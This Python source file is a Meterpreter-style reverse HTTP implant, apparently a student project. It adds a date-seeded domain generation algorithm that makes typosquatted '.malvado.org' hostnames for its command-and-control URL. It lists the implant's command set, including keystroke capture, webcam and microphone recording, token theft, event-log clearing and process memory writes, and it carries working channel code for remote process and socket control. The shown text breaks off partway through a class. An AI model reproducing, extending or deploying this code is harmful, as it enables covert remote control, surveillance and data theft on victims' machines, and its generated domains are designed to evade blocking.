#!/usr/bin/python
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback

# ***************************** imports domains ***************************
import random
from datetime import date
import string
# ***************************** imports domains ***************************

try:
    import ctypes
except ImportError:
    has_windll = False
else:
    has_windll = hasattr(ctypes, 'windll')

try:
    urllib_imports = ['ProxyBasicAuthHandler', 'ProxyHandler', 'HTTPSHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
    if sys.version_info[0] < 3:
        urllib = __import__('urllib2', fromlist=urllib_imports)
    else:
        urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
    has_urllib = False
else:
    has_urllib = True

if sys.version_info[0] < 3:
    is_str = lambda obj: issubclass(obj.__class__, str)
    is_bytes = lambda obj: issubclass(obj.__class__, str)
    bytes = lambda *args: str(*args[:1])
    NULL_BYTE = '\x00'
    unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
    if isinstance(__builtins__, dict):
        is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
        str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
    else:
        is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
        str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
    is_bytes = lambda obj: issubclass(obj.__class__, bytes)
    NULL_BYTE = bytes('\x00', 'UTF-8')
    long = int
    unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)

# reseed the random generator.
random.seed()

#
# Constants
#

# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
TRY_TO_FORK = True



# ***************************CODE TO GENERATE VALID DOMAIN ****************************
def generate_domain():

	NUM_REDIRECTORS = 4

	fileIn = open('top-200.csv', 'r')
	names = fileIn.readlines()
	fileIn.close()
	valid_names = []

	for name in names:
		#remove numbers and domain
		valid_names.append(name.strip().split(",")[1].split(".")[0])

	#remove duplicate
	valid_names = [i for n, i in enumerate(valid_names) if i not in valid_names[:n]]

	#generate date seed

	#random.seed(11)
	#print(date.today())

	random.seed(date.today().strftime("%Y%m%d"))
	#choose random domain names
	random_indices = random.sample(range(0,len(valid_names)), NUM_REDIRECTORS)

	valid_names_random = []

	for j in range(NUM_REDIRECTORS):
		valid_names_random.append(valid_names[random_indices[j]])

	changed_names_random = []

	for n in range(NUM_REDIRECTORS):

		if len(valid_names[random_indices[n]]) > 1:
			#generate 2 random position to change
			change_characters = random.sample(range(0,len(valid_names[random_indices[n]])), 2)
			temp = list(valid_names_random[n]) 
			#change 2 characters
			temp[change_characters[0]] = random.choices(string.ascii_lowercase)[0]
			temp[change_characters[1]] = random.choices(string.ascii_lowercase)[0]

			changed_names_random.append(''.join(temp))
			
			#add TFG domain
			changed_names_random[n] = changed_names_random[n] + ".malvado.org"

		else:
			temp = random.choices(string.ascii_lowercase)[0]
			changed_names_random.append(''.join(temp))
			changed_names_random[n] = changed_names_random[n] + ".malvado.org"

			
	# reseed the random generator.
	random.seed()
	redirector = changed_names_random[random.randrange(0,NUM_REDIRECTORS)]
	# (redirector)
	#print (changed_names_random)
	return redirector
# ***************************CODE TO GENERATE VALID DOMAIN ****************************



HTTP_CONNECTION_URL = 'http://'+generate_domain()+'/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/'
HTTP_PROXY = None
HTTP_USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15'
HTTP_COOKIE = None
HTTP_HOST = None
HTTP_REFERER = None
PAYLOAD_UUID = '7031be3998711dd86232772600499ece'
SESSION_GUID = 'c1c5a4dd8ba44aacba715ad2b95086b6'
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10

PACKET_TYPE_REQUEST        = 0
PACKET_TYPE_RESPONSE       = 1
PACKET_TYPE_PLAIN_REQUEST  = 10
PACKET_TYPE_PLAIN_RESPONSE = 11

ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3

CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM   = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL     = 3

#
# TLV Meta Types
#
TLV_META_TYPE_NONE       = (   0   )
TLV_META_TYPE_STRING     = (1 << 16)
TLV_META_TYPE_UINT       = (1 << 17)
TLV_META_TYPE_RAW        = (1 << 18)
TLV_META_TYPE_BOOL       = (1 << 19)
TLV_META_TYPE_QWORD      = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP      = (1 << 30)
TLV_META_TYPE_COMPLEX    = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)

#
# TLV base starting points
#
TLV_RESERVED   = 0
TLV_EXTENSIONS = 20000
TLV_USER       = 40000
TLV_TEMP       = 60000

#
# TLV Specific Types
#
TLV_TYPE_ANY                   = TLV_META_TYPE_NONE    | 0
TLV_TYPE_COMMAND_ID            = TLV_META_TYPE_UINT    | 1
TLV_TYPE_REQUEST_ID            = TLV_META_TYPE_STRING  | 2
TLV_TYPE_EXCEPTION             = TLV_META_TYPE_GROUP   | 3
TLV_TYPE_RESULT                = TLV_META_TYPE_UINT    | 4

TLV_TYPE_STRING                = TLV_META_TYPE_STRING  | 10
TLV_TYPE_UINT                  = TLV_META_TYPE_UINT    | 11
TLV_TYPE_BOOL                  = TLV_META_TYPE_BOOL    | 12

TLV_TYPE_LENGTH                = TLV_META_TYPE_UINT    | 25
TLV_TYPE_DATA                  = TLV_META_TYPE_RAW     | 26
TLV_TYPE_FLAGS                 = TLV_META_TYPE_UINT    | 27

TLV_TYPE_CHANNEL_ID            = TLV_META_TYPE_UINT    | 50
TLV_TYPE_CHANNEL_TYPE          = TLV_META_TYPE_STRING  | 51
TLV_TYPE_CHANNEL_DATA          = TLV_META_TYPE_RAW     | 52
TLV_TYPE_CHANNEL_DATA_GROUP    = TLV_META_TYPE_GROUP   | 53
TLV_TYPE_CHANNEL_CLASS         = TLV_META_TYPE_UINT    | 54
TLV_TYPE_CHANNEL_PARENTID      = TLV_META_TYPE_UINT    | 55

TLV_TYPE_SEEK_WHENCE           = TLV_META_TYPE_UINT    | 70
TLV_TYPE_SEEK_OFFSET           = TLV_META_TYPE_UINT    | 71
TLV_TYPE_SEEK_POS              = TLV_META_TYPE_UINT    | 72

TLV_TYPE_EXCEPTION_CODE        = TLV_META_TYPE_UINT    | 300
TLV_TYPE_EXCEPTION_STRING      = TLV_META_TYPE_STRING  | 301

TLV_TYPE_LIBRARY_PATH          = TLV_META_TYPE_STRING  | 400
TLV_TYPE_TARGET_PATH           = TLV_META_TYPE_STRING  | 401

TLV_TYPE_TRANS_TYPE            = TLV_META_TYPE_UINT    | 430
TLV_TYPE_TRANS_URL             = TLV_META_TYPE_STRING  | 431
TLV_TYPE_TRANS_UA              = TLV_META_TYPE_STRING  | 432
TLV_TYPE_TRANS_COMM_TIMEOUT    = TLV_META_TYPE_UINT    | 433
TLV_TYPE_TRANS_SESSION_EXP     = TLV_META_TYPE_UINT    | 434
TLV_TYPE_TRANS_CERT_HASH       = TLV_META_TYPE_RAW     | 435
TLV_TYPE_TRANS_PROXY_HOST      = TLV_META_TYPE_STRING  | 436
TLV_TYPE_TRANS_PROXY_USER      = TLV_META_TYPE_STRING  | 437
TLV_TYPE_TRANS_PROXY_PASS      = TLV_META_TYPE_STRING  | 438
TLV_TYPE_TRANS_RETRY_TOTAL     = TLV_META_TYPE_UINT    | 439
TLV_TYPE_TRANS_RETRY_WAIT      = TLV_META_TYPE_UINT    | 440
TLV_TYPE_TRANS_HEADERS         = TLV_META_TYPE_STRING  | 441
TLV_TYPE_TRANS_GROUP           = TLV_META_TYPE_GROUP   | 442

TLV_TYPE_MACHINE_ID            = TLV_META_TYPE_STRING  | 460
TLV_TYPE_UUID                  = TLV_META_TYPE_RAW     | 461
TLV_TYPE_SESSION_GUID          = TLV_META_TYPE_RAW     | 462

TLV_TYPE_RSA_PUB_KEY           = TLV_META_TYPE_RAW     | 550
TLV_TYPE_SYM_KEY_TYPE          = TLV_META_TYPE_UINT    | 551
TLV_TYPE_SYM_KEY               = TLV_META_TYPE_RAW     | 552
TLV_TYPE_ENC_SYM_KEY           = TLV_META_TYPE_RAW     | 553

TLV_TYPE_PEER_HOST             = TLV_META_TYPE_STRING  | 1500
TLV_TYPE_PEER_PORT             = TLV_META_TYPE_UINT    | 1501
TLV_TYPE_LOCAL_HOST            = TLV_META_TYPE_STRING  | 1502
TLV_TYPE_LOCAL_PORT            = TLV_META_TYPE_UINT    | 1503


EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING

ENC_NONE = 0
ENC_AES256 = 1

# Packet header sizes
PACKET_XOR_KEY_SIZE = 4
PACKET_SESSION_GUID_SIZE = 16
PACKET_ENCRYPT_FLAG_SIZE = 4
PACKET_LENGTH_SIZE = 4
PACKET_TYPE_SIZE = 4
PACKET_LENGTH_OFF = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
        PACKET_ENCRYPT_FLAG_SIZE)
PACKET_HEADER_SIZE = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
        PACKET_ENCRYPT_FLAG_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE)

# ---------------------------------------------------------------
# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-05-01 05:29:59 UTC
EXTENSION_ID_CORE = 0
EXTENSION_ID_STDAPI = 1000
COMMAND_IDS = (
    (1, 'core_channel_close'),
    (2, 'core_channel_eof'),
    (3, 'core_channel_interact'),
    (4, 'core_channel_open'),
    (5, 'core_channel_read'),
    (6, 'core_channel_seek'),
    (7, 'core_channel_tell'),
    (8, 'core_channel_write'),
    (9, 'core_console_write'),
    (10, 'core_enumextcmd'),
    (11, 'core_get_session_guid'),
    (12, 'core_loadlib'),
    (13, 'core_machine_id'),
    (14, 'core_migrate'),
    (15, 'core_native_arch'),
    (16, 'core_negotiate_tlv_encryption'),
    (17, 'core_patch_url'),
    (18, 'core_pivot_add'),
    (19, 'core_pivot_remove'),
    (20, 'core_pivot_session_died'),
    (21, 'core_set_session_guid'),
    (22, 'core_set_uuid'),
    (23, 'core_shutdown'),
    (24, 'core_transport_add'),
    (25, 'core_transport_change'),
    (26, 'core_transport_getcerthash'),
    (27, 'core_transport_list'),
    (28, 'core_transport_next'),
    (29, 'core_transport_prev'),
    (30, 'core_transport_remove'),
    (31, 'core_transport_setcerthash'),
    (32, 'core_transport_set_timeouts'),
    (33, 'core_transport_sleep'),
    (1001, 'stdapi_fs_chdir'),
    (1002, 'stdapi_fs_chmod'),
    (1003, 'stdapi_fs_delete_dir'),
    (1004, 'stdapi_fs_delete_file'),
    (1005, 'stdapi_fs_file_copy'),
    (1006, 'stdapi_fs_file_expand_path'),
    (1007, 'stdapi_fs_file_move'),
    (1008, 'stdapi_fs_getwd'),
    (1009, 'stdapi_fs_ls'),
    (1010, 'stdapi_fs_md5'),
    (1011, 'stdapi_fs_mkdir'),
    (1012, 'stdapi_fs_mount_show'),
    (1013, 'stdapi_fs_search'),
    (1014, 'stdapi_fs_separator'),
    (1015, 'stdapi_fs_sha1'),
    (1016, 'stdapi_fs_stat'),
    (1017, 'stdapi_net_config_add_route'),
    (1018, 'stdapi_net_config_get_arp_table'),
    (1019, 'stdapi_net_config_get_interfaces'),
    (1020, 'stdapi_net_config_get_netstat'),
    (1021, 'stdapi_net_config_get_proxy'),
    (1022, 'stdapi_net_config_get_routes'),
    (1023, 'stdapi_net_config_remove_route'),
    (1024, 'stdapi_net_resolve_host'),
    (1025, 'stdapi_net_resolve_hosts'),
    (1026, 'stdapi_net_socket_tcp_shutdown'),
    (1027, 'stdapi_net_tcp_channel_open'),
    (1028, 'stdapi_railgun_api'),
    (1029, 'stdapi_railgun_api_multi'),
    (1030, 'stdapi_railgun_memread'),
    (1031, 'stdapi_railgun_memwrite'),
    (1032, 'stdapi_registry_check_key_exists'),
    (1033, 'stdapi_registry_close_key'),
    (1034, 'stdapi_registry_create_key'),
    (1035, 'stdapi_registry_delete_key'),
    (1036, 'stdapi_registry_delete_value'),
    (1037, 'stdapi_registry_enum_key'),
    (1038, 'stdapi_registry_enum_key_direct'),
    (1039, 'stdapi_registry_enum_value'),
    (1040, 'stdapi_registry_enum_value_direct'),
    (1041, 'stdapi_registry_load_key'),
    (1042, 'stdapi_registry_open_key'),
    (1043, 'stdapi_registry_open_remote_key'),
    (1044, 'stdapi_registry_query_class'),
    (1045, 'stdapi_registry_query_value'),
    (1046, 'stdapi_registry_query_value_direct'),
    (1047, 'stdapi_registry_set_value'),
    (1048, 'stdapi_registry_set_value_direct'),
    (1049, 'stdapi_registry_unload_key'),
    (1050, 'stdapi_sys_config_driver_list'),
    (1051, 'stdapi_sys_config_drop_token'),
    (1052, 'stdapi_sys_config_getenv'),
    (1053, 'stdapi_sys_config_getprivs'),
    (1054, 'stdapi_sys_config_getsid'),
    (1055, 'stdapi_sys_config_getuid'),
    (1056, 'stdapi_sys_config_localtime'),
    (1057, 'stdapi_sys_config_rev2self'),
    (1058, 'stdapi_sys_config_steal_token'),
    (1059, 'stdapi_sys_config_sysinfo'),
    (1060, 'stdapi_sys_eventlog_clear'),
    (1061, 'stdapi_sys_eventlog_close'),
    (1062, 'stdapi_sys_eventlog_numrecords'),
    (1063, 'stdapi_sys_eventlog_oldest'),
    (1064, 'stdapi_sys_eventlog_open'),
    (1065, 'stdapi_sys_eventlog_read'),
    (1066, 'stdapi_sys_power_exitwindows'),
    (1067, 'stdapi_sys_process_attach'),
    (1068, 'stdapi_sys_process_close'),
    (1069, 'stdapi_sys_process_execute'),
    (1070, 'stdapi_sys_process_get_info'),
    (1071, 'stdapi_sys_process_get_processes'),
    (1072, 'stdapi_sys_process_getpid'),
    (1073, 'stdapi_sys_process_image_get_images'),
    (1074, 'stdapi_sys_process_image_get_proc_address'),
    (1075, 'stdapi_sys_process_image_load'),
    (1076, 'stdapi_sys_process_image_unload'),
    (1077, 'stdapi_sys_process_kill'),
    (1078, 'stdapi_sys_process_memory_allocate'),
    (1079, 'stdapi_sys_process_memory_free'),
    (1080, 'stdapi_sys_process_memory_lock'),
    (1081, 'stdapi_sys_process_memory_protect'),
    (1082, 'stdapi_sys_process_memory_query'),
    (1083, 'stdapi_sys_process_memory_read'),
    (1084, 'stdapi_sys_process_memory_unlock'),
    (1085, 'stdapi_sys_process_memory_write'),
    (1086, 'stdapi_sys_process_thread_close'),
    (1087, 'stdapi_sys_process_thread_create'),
    (1088, 'stdapi_sys_process_thread_get_threads'),
    (1089, 'stdapi_sys_process_thread_open'),
    (1090, 'stdapi_sys_process_thread_query_regs'),
    (1091, 'stdapi_sys_process_thread_resume'),
    (1092, 'stdapi_sys_process_thread_set_regs'),
    (1093, 'stdapi_sys_process_thread_suspend'),
    (1094, 'stdapi_sys_process_thread_terminate'),
    (1095, 'stdapi_sys_process_wait'),
    (1096, 'stdapi_ui_desktop_enum'),
    (1097, 'stdapi_ui_desktop_get'),
    (1098, 'stdapi_ui_desktop_screenshot'),
    (1099, 'stdapi_ui_desktop_set'),
    (1100, 'stdapi_ui_enable_keyboard'),
    (1101, 'stdapi_ui_enable_mouse'),
    (1102, 'stdapi_ui_get_idle_time'),
    (1103, 'stdapi_ui_get_keys_utf8'),
    (1104, 'stdapi_ui_send_keyevent'),
    (1105, 'stdapi_ui_send_keys'),
    (1106, 'stdapi_ui_send_mouse'),
    (1107, 'stdapi_ui_start_keyscan'),
    (1108, 'stdapi_ui_stop_keyscan'),
    (1109, 'stdapi_ui_unlock_desktop'),
    (1110, 'stdapi_webcam_audio_record'),
    (1111, 'stdapi_webcam_get_frame'),
    (1112, 'stdapi_webcam_list'),
    (1113, 'stdapi_webcam_start'),
    (1114, 'stdapi_webcam_stop'),
    (1115, 'stdapi_audio_mic_start'),
    (1116, 'stdapi_audio_mic_stop'),
    (1117, 'stdapi_audio_mic_list'),
    (1118, 'stdapi_sys_process_set_term_size'),

)
# ---------------------------------------------------------------

class SYSTEM_INFO(ctypes.Structure):
    _fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
        ("wReserved", ctypes.c_uint16),
        ("dwPageSize", ctypes.c_uint32),
        ("lpMinimumApplicationAddress", ctypes.c_void_p),
        ("lpMaximumApplicationAddress", ctypes.c_void_p),
        ("dwActiveProcessorMask", ctypes.c_uint32),
        ("dwNumberOfProcessors", ctypes.c_uint32),
        ("dwProcessorType", ctypes.c_uint32),
        ("dwAllocationGranularity", ctypes.c_uint32),
        ("wProcessorLevel", ctypes.c_uint16),
        ("wProcessorRevision", ctypes.c_uint16)]

def rand_bytes(n):
    return os.urandom(n)

def rand_xor_key():
    return tuple(random.randint(1, 255) for _ in range(4))

def xor_bytes(key, data):
    if sys.version_info[0] < 3:
        dexored = ''.join(chr(ord(data[i]) ^ key[i % len(key)]) for i in range(len(data)))
    else:
        dexored = bytes(data[i] ^ key[i % len(key)] for i in range(len(data)))
    return dexored

def export(symbol):
    EXPORTED_SYMBOLS[symbol.__name__] = symbol
    return symbol

def generate_request_id():
    chars = 'abcdefghijklmnopqrstuvwxyz'
    return ''.join(random.choice(chars) for x in range(32))

@export
def cmd_id_to_string(this_id):
    for that_id, that_string in COMMAND_IDS:
        if this_id == that_id:
            return that_string
    debug_print('[*] failed to lookup string for command id: ' + str(this_id))
    return None

@export
def cmd_string_to_id(this_string):
    for that_id, that_string in COMMAND_IDS:
        if this_string == that_string:
            return that_id
    debug_print('[*] failed to lookup id for command string: ' + this_string)
    return None

@export
def crc16(data):
    poly = 0x1021
    reg = 0x0000
    if is_str(data):
        data = list(map(ord, data))
    elif is_bytes(data):
        data = list(data)
    data.append(0)
    data.append(0)
    for byte in data:
        mask = 0x80
        while mask > 0:
            reg <<= 1
            if byte & mask:
                reg += 1
            mask >>= 1
            if reg > 0xffff:
                reg &= 0xffff
                reg ^= poly
    return reg

@export
def debug_print(msg):
    if DEBUGGING:
        print(msg)

@export
def debug_traceback(msg=None):
    if DEBUGGING:
        if msg:
            print(msg)
        traceback.print_exc(file=sys.stderr)

@export
def error_result(exception=None):
    if not exception:
        _, exception, _ = sys.exc_info()
    exception_crc = crc16(exception.__class__.__name__)
    if exception_crc == 0x4cb2: # WindowsError
        return error_result_windows(exception.errno)
    else:
        result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
    return result

@export
def error_result_windows(error_number=None):
    if not has_windll:
        return ERROR_FAILURE
    if error_number == None:
        error_number = ctypes.windll.kernel32.GetLastError()
    if error_number > 0xffff:
        return ERROR_FAILURE
    result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
    return result

@export
def get_hdd_label():
    for _, _, files in os.walk('/dev/disk/by-id/'):
        for f in files:
            for p in ['ata-', 'mb-']:
                if f[:len(p)] == p:
                    return f[len(p):]
    return ''

@export
def get_native_arch():
    arch = get_system_arch()
    if arch == 'x64' and ctypes.sizeof(ctypes.c_void_p) == 4:
        arch = 'x86'
    return arch

@export
def get_system_arch():
    uname_info = platform.uname()
    arch = uname_info[4]
    if has_windll:
        sysinfo = SYSTEM_INFO()
        ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
        values = {0:'x86', 5:'armle', 6:'IA64', 9:'x64'}
        arch = values.get(sysinfo.wProcessorArchitecture, uname_info[4])
    if arch == 'x86_64':
        arch = 'x64'
    return arch

@export
def inet_pton(family, address):
    if family == socket.AF_INET6 and '%' in address:
        address = address.split('%', 1)[0]
    if hasattr(socket, 'inet_pton'):
        return socket.inet_pton(family, address)
    elif has_windll:
        WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
        lpAddress = (ctypes.c_ubyte * 28)()
        lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
        if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
            raise Exception('WSAStringToAddress failed')
        if family == socket.AF_INET:
            return ''.join(map(chr, lpAddress[4:8]))
        elif family == socket.AF_INET6:
            return ''.join(map(chr, lpAddress[8:24]))
    raise Exception('no suitable inet_pton functionality is available')

@export
def packet_enum_tlvs(pkt, tlv_type=None):
    offset = 0
    while offset < len(pkt):
        tlv = struct.unpack('>II', pkt[offset:offset + 8])
        if tlv_type is None or (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
            val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
            if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
                val = str(val.split(NULL_BYTE, 1)[0])
            elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
                val = struct.unpack('>I', val)[0]
            elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
                val = struct.unpack('>Q', val)[0]
            elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
                val = bool(struct.unpack('b', val)[0])
            elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
                pass
            yield {'type': tlv[1], 'length': tlv[0], 'value': val}
        offset += tlv[0]
    return

@export
def packet_get_tlv(pkt, tlv_type):
    try:
        tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
    except IndexError:
        return {}
    return tlv

@export
def tlv_pack(*args):
    if len(args) == 2:
        tlv = {'type':args[0], 'value':args[1]}
    else:
        tlv = args[0]
    data = ''
    value = tlv['value']
    if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
        if isinstance(value, float):
            value = int(round(value))
        data = struct.pack('>III', 12, tlv['type'], value)
    elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
        data = struct.pack('>IIQ', 16, tlv['type'], value)
    elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
        data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
    else:
        if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
            value = value.encode('UTF-8')
        elif not is_bytes(value):
            value = bytes(value, 'UTF-8')
        if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
            data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
        elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
            data = struct.pack('>II', 8 + len(value), tlv['type']) + value
        elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
            data = struct.pack('>II', 8 + len(value), tlv['type']) + value
        elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
            data = struct.pack('>II', 8 + len(value), tlv['type']) + value
    return data

@export
def tlv_pack_request(method, parts=None):
    pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
    pkt += tlv_pack(TLV_TYPE_COMMAND_ID, cmd_string_to_id(method))
    pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
    pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
    parts = parts or []
    for part in parts:
        pkt += tlv_pack(part['type'], part['value'])
    return pkt

#@export
class MeterpreterChannel(object):
    def core_close(self, request, response):
        self.close()
        return ERROR_SUCCESS, response

    def core_eof(self, request, response):
        response += tlv_pack(TLV_TYPE_BOOL, self.eof())
        return ERROR_SUCCESS, response

    def core_read(self, request, response):
        length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
        response += tlv_pack(TLV_TYPE_CHANNEL_DATA, self.read(length))
        return ERROR_SUCCESS, response

    def core_write(self, request, response):
        channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
        response += tlv_pack(TLV_TYPE_LENGTH, self.write(channel_data))
        return ERROR_SUCCESS, response

    def core_seek(self, request, response):
        offset = packet_get_tlv(request, TLV_TYPE_SEEK_OFFSET)['value']
        whence = packet_get_tlv(request, TLV_TYPE_SEEK_WHENCE)['value']
        self.seek(offset, whence)
        return ERROR_SUCCESS, response

    def core_tell(self, request, response):
        response += tlv_pack(TLV_TYPE_SEEK_POS, self.tell())
        return ERROR_SUCCESS, response

    def close(self):
        raise NotImplementedError()

    def eof(self):
        return False

    def is_alive(self):
        return True

    def notify(self):
        return None

    def read(self, length):
        raise NotImplementedError()

    def write(self, data):
        raise NotImplementedError()

    def seek(self, offset, whence=os.SEEK_SET):
        raise NotImplementedError()

    def tell(self):
        raise NotImplementedError()

#@export
class MeterpreterFile(MeterpreterChannel):
    def __init__(self, file_obj):
        self.file_obj = file_obj
        super(MeterpreterFile, self).__init__()

    def close(self):
        self.file_obj.close()

    def eof(self):
        return self.file_obj.tell() >= os.fstat(self.file_obj.fileno()).st_size

    def read(self, length):
        return self.file_obj.read(length)

    def write(self, data):
        self.file_obj.write(data)
        return len(data)

    def seek(self, offset, whence=os.SEEK_SET):
        self.file_obj.seek(offset, whence)

    def tell(self):
        return self.file_obj.tell()
export(MeterpreterFile)

#@export
class MeterpreterProcess(MeterpreterChannel):
    def __init__(self, proc_h):
        self.proc_h = proc_h
        super(MeterpreterProcess, self).__init__()

    def close(self):
        if self.proc_h.poll() is None:
            self.proc_h.kill()
        if self.proc_h.ptyfd is not None:
            os.close(self.proc_h.ptyfd)
            self.proc_h.ptyfd = None
        for stream in (self.proc_h.stdin, self.proc_h.stdout, self.proc_h.stderr):
            if not hasattr(stream, 'close'):
                continue
            try:
                stream.close()
            except (IOError, OSError):
                pass

    def is_alive(self):
        return self.proc_h.is_alive()

    def read(self, length):
        data = bytes()
        stderr_reader = self.proc_h.stderr_reader
        stdout_reader = self.proc_h.stdout_reader
        if stderr_reader.is_read_ready() and length > 0:
            data += stderr_reader.read(length)
        if stdout_reader.is_read_ready() and (length - len(data)) > 0:
            data += stdout_reader.read(length - len(data))
        return data

    def write(self, data):
        self.proc_h.write(data)
        return len(data)
export(MeterpreterProcess)

#@export
class MeterpreterSocket(MeterpreterChannel):
    def __init__(self, sock):
        self.sock = sock
        self._is_alive = True
        super(MeterpreterSocket, self).__init__()

    def core_write(self, request, response):
        try:
            status, response = super(MeterpreterSocket, self).core_write(request, response)
        except socket.error:
            self.close()
            self._is_alive = False
            status = ERROR_FAILURE
        return status, response

    def close(self):
        return self.sock.close()

    def fileno(self):
        return self.sock.fileno()

    def is_alive(self):
        return self._is_alive

    def read(self, length):
        return self.sock.recv(length)

    def write(self, data):
        return self.sock.send(data)
export(MeterpreterSocket)

#@export
class MeterpreterSocketTCPClient(MeterpreterSocket):
    pass
export(MeterpreterSocketTCPClient)

#@export
class MeterpreterSocketTCPServer(MeterpreterSocket):
    pass
export(MeterpreterSocketTCPServer)

#@export
class MeterpreterSocketUDPClient(MeterpreterSocket):
    def __init__(self, sock, peer_address=None):
        super(MeterpreterSocketUDPClient, self).__init__(sock)
        self.peer_address = peer_address

    def core_write(self, request, response):
        peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST).get('value')
        peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value')
        if peer_host and peer_port:
            peer_address = (peer_host, peer_port)
        elif self.peer_address:
            peer_address = self.peer_address
        else:
            raise RuntimeError('peer_host and peer_port must be specified with an unbound/unconnected UDP channel')
        channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
        try:
            length = self.sock.sendto(channel_data, peer_address)
        except socket.error:
            self.close()
            self._is_alive = False
            status = ERROR_FAILURE
        else:
            response += tlv_pack(TLV_TYPE_LENGTH, length)
            status = ERROR_SUCCESS
        return status, response

    def read(self, length):
        return self.sock.recvfrom(length)[0]

    def write(self, data):
        self.sock.sendto(data, self.peer_address)
export(MeterpreterSocketUDPClient)

class STDProcessBuffer(threading.Thread):
    def __init__(self, std, is_alive, name=None):
        threading.Thread.__init__(self, name=name or self.__class__.__name__)
        self.std = std
        self.is_alive = is_alive
        self.data = bytes()
        self.data_lock = threading.RLock()
        self._is_reading = True

    def _read1(self):
        try:
            return self.std.read(1)
        except (IOError, OSError):
            return bytes()

    def run(self):
        try:
            byte = self._read1()
            while len(byte) > 0:
                self.data_lock.acquire()
                self.data += byte
                self.data_lock.release()
                byte = self._read1()
        finally:
            self._is_reading = False

    def is_reading(self):
        return self._is_reading or self.is_read_ready()

    def is_read_ready(self):
        return len(self.data) != 0

    def peek(self, l = None):
        data = bytes()
        self.data_lock.acquire()
        if l == None:
            data = self.data
        else:
            data = self.data[0:l]
        self.data_lock.release()
        return data

    def read(self, l = None):
        self.data_lock.acquire()
        data = self.peek(l)
        self.data = self.data[len(data):]
        self.data_lock.release()
        return data

#@export
class STDProcess(subprocess.Popen):
    def __init__(self, *args, **kwargs):
        debug_print('[*] starting process: ' + repr(args[0]))
        subprocess.Popen.__init__(self, *args, **kwargs)
        self.echo_protection = False
        self.ptyfd = None

    def is_alive(self):
        is_proc_alive = self.poll() is None
        is_stderr_reading = self.stderr_reader.is_reading()
        is_stdout_reading = self.stdout_reader.is_reading()

        return is_proc_alive or is_stderr_reading or is_stdout_reading

    def start(self):
        self.stdout_reader = STDProcessBuffer(self.stdout, self.is_alive, name='STDProcessBuffer.stdout')
        self.stdout_reader.start()
